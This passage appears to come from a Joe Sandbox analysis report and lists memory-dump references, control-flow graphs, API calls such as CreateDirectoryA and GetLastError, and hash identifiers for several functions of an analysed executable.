                                  • Associated: 00000000.00000002.2257697982.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000ED7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_820000_tMO4FVIc9l.jbxd
                                  Similarity
                                  • API ID: Cpp_errorThrow_std::_$ErrorLast
                                  • String ID:
                                  • API String ID: 2454169095-0
                                  • Opcode ID: f3a9068093bee229e716655d09ce12d0afa112b82cfe224b895f35fb0b52e58c
                                  • Instruction ID: 13f05bcbb948850e8a1ce8639c7d0d084c08a1eda344559abb4cfb6ad0af100c
                                  • Opcode Fuzzy Hash: f3a9068093bee229e716655d09ce12d0afa112b82cfe224b895f35fb0b52e58c
                                  • Instruction Fuzzy Hash: E3117AB1A042469FCB305F6C6C457A93BACFB63B34F204315E9359B2D0DF314825C692

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 5711 906c10-906c42 call 852b99 5714 906c82-906c84 call 852534 5711->5714 5715 906c44-906c4e 5711->5715 5717 906c89-906c9a call 852534 5714->5717 5716 906c50-906c69 CreateDirectoryA call 852baa 5715->5716 5715->5717 5722 906c6e-906c81 5716->5722
                                  APIs
                                  • CreateDirectoryA.KERNEL32(?,00000000,00000005), ref: 00906C55
                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00906C84
                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00906C95
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2257253231.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000000.00000002.2257233006.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257400311.00000000009A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257416652.00000000009AA000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257497150.0000000000AD3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257511767.0000000000AD4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000ED7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_820000_tMO4FVIc9l.jbxd
                                  Similarity
                                  • API ID: Cpp_errorThrow_std::_$CreateDirectory
                                  • String ID:
                                  • API String ID: 2715195259-0
                                  • Opcode ID: d09a06d3d16b505267c6e3ecac855b342d40d4e9adb37ba58b20ec45c8c8c96e
                                  • Instruction ID: 26b9a712a28c5d69049713a0b022a202351f717f6e9bf07908adbebef7b555b2
                                  • Opcode Fuzzy Hash: d09a06d3d16b505267c6e3ecac855b342d40d4e9adb37ba58b20ec45c8c8c96e
                                  • Instruction Fuzzy Hash: 00F0D1B2905614EFD3209F5CAC06B6A77E8FB47B35F100369F9359A3D0EB71091186E2

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 5997 8f6790-8f686c 5998 8f6870-8f6875 5997->5998 5998->5998 5999 8f6877-8f68ad call 823040 5998->5999 6002 8f68b0-8f68b5 5999->6002 6002->6002 6003 8f68b7-8f68f2 call 823040 call 9064d0 6002->6003 6008 8f6a4c-8f6a54 call 91ad00 6003->6008 6009 8f68f8-8f69f4 call 9063a0 call 83ab20 call 83e710 call 83ad80 call 822df0 6003->6009 6013 8f6a59-8f6a5c 6008->6013 6025 8f69f9-8f6a2b call 822df0 * 2 call a3cfb0 6009->6025 6015 8f6a5e-8f6a81 call 8385d0 6013->6015 6033 8f6a2d-8f6a3e call 8f6ba0 6025->6033 6036 8f6a82-8f6a9b call 852b99 6033->6036 6037 8f6a40-8f6a47 call 822df0 6033->6037 6041 8f6b82-8f6b84 call 852534 6036->6041 6042 8f6aa1-8f6aab 6036->6042 6037->6008 6044 8f6b89-8f6b9a call 852534 6041->6044 6042->6044 6045 8f6ab1-8f6ac8 call 91ad00 6042->6045 6048 8f6acd-8f6af9 call 8363b0 6045->6048 6052 8f6afb-8f6b42 6048->6052 6053 8f6b44-8f6b4c call 843a30 6048->6053 6054 8f6b51-8f6b7d call 822df0 call 852baa call 822df0 6052->6054 6053->6054 6054->6015
                                  APIs
                                    • Part of subcall function 008F6BA0: GetLastError.KERNEL32(?,00000000), ref: 008F6BD3
                                  • std::_Throw_Cpp_error.LIBCPMT ref: 008F6B84
                                    • Part of subcall function 00852534: __EH_prolog3.LIBCMT ref: 00852570
                                  • std::_Throw_Cpp_error.LIBCPMT ref: 008F6B95
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2257253231.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000000.00000002.2257233006.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257400311.00000000009A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257416652.00000000009AA000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257497150.0000000000AD3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257511767.0000000000AD4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000ED7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_820000_tMO4FVIc9l.jbxd
                                  Similarity
                                  • API ID: Cpp_errorThrow_std::_$ErrorH_prolog3Last
                                  • String ID:
                                  • API String ID: 3618116002-0
                                  • Opcode ID: 3bf96592c70d4d60c42595918d01fc12392b6325a4f8d9abd3826092f1a1a593
                                  • Instruction ID: 3cfa20c40993524ed33be330ace566dbc6b34a47c4bc6f6682dcc4d882c14af3
                                  • Opcode Fuzzy Hash: 3bf96592c70d4d60c42595918d01fc12392b6325a4f8d9abd3826092f1a1a593
                                  • Instruction Fuzzy Hash: 33C17AB0C0025DDBDB14DFA8C9457EDBBB0FF55314F244299D805BB282EB745A89CBA2

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 6062 8f65f0-8f6639 call 852b99 6065 8f663f-8f6649 6062->6065 6066 8f6768-8f676a call 852534 6062->6066 6067 8f676f-8f6780 call 852534 6065->6067 6068 8f664f-8f666c 6065->6068 6066->6067 6071 8f668e-8f6695 call 96b110 6068->6071 6072 8f666e 6068->6072 6079 8f6698-8f66c1 call 852baa 6071->6079 6074 8f6670-8f6674 6072->6074 6076 8f6676-8f668c 6074->6076 6077 8f66c2-8f66e3 call 96b110 6074->6077 6076->6071 6076->6074 6083 8f66e7-8f66e8 call 85d25e 6077->6083 6084 8f66e5 6077->6084 6087 8f66ed-8f6706 6083->6087 6084->6083 6088 8f674d-8f6763 call 822df0 6087->6088 6089 8f6708-8f670d 6087->6089 6088->6079 6090 8f670f-8f6737 call 822df0 6089->6090 6091 8f673a-8f6745 6089->6091 6090->6091 6091->6089 6094 8f6747 6091->6094 6094->6088
                                  APIs
                                  • std::_Throw_Cpp_error.LIBCPMT ref: 008F676A
                                  • std::_Throw_Cpp_error.LIBCPMT ref: 008F677B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2257253231.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000000.00000002.2257233006.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257400311.00000000009A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257416652.00000000009AA000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257497150.0000000000AD3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257511767.0000000000AD4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000ED7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_820000_tMO4FVIc9l.jbxd
                                  Similarity
                                  • API ID: Cpp_errorThrow_std::_
                                  • String ID:
                                  • API String ID: 2134207285-0
                                  • Opcode ID: df28165031b50b1a17065ccc2fdf26629cb7b0407e4286df580a78ff4a2f0804
                                  • Instruction ID: f1af5a2a226bee89d7eadb2272c09608d23209b5e2d0f6d123187b9a1f6528b0
                                  • Opcode Fuzzy Hash: df28165031b50b1a17065ccc2fdf26629cb7b0407e4286df580a78ff4a2f0804
                                  • Instruction Fuzzy Hash: 7341E0B1E043099BCB20DF7C994236AB7B0FB92314F180329E825DB291EB75A954C7D2

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 6097 86b9d0-86b9d9 call a6ffe6 6099 86b9de-86b9e0 6097->6099 6100 86b9f4-86b9f7 6099->6100 6101 86b9e2-86b9f3 GetLastError call 8616a5 6099->6101
                                  APIs
                                  • GetLastError.KERNEL32(?,?,?,0085D2B1,?), ref: 0086B9E2
                                  • __dosmaperr.LIBCMT ref: 0086B9E9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2257253231.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000000.00000002.2257233006.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257400311.00000000009A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257416652.00000000009AA000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257497150.0000000000AD3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257511767.0000000000AD4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000ED7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_820000_tMO4FVIc9l.jbxd
                                  Similarity
                                  • API ID: ErrorLast__dosmaperr
                                  • String ID:
                                  • API String ID: 1659562826-0
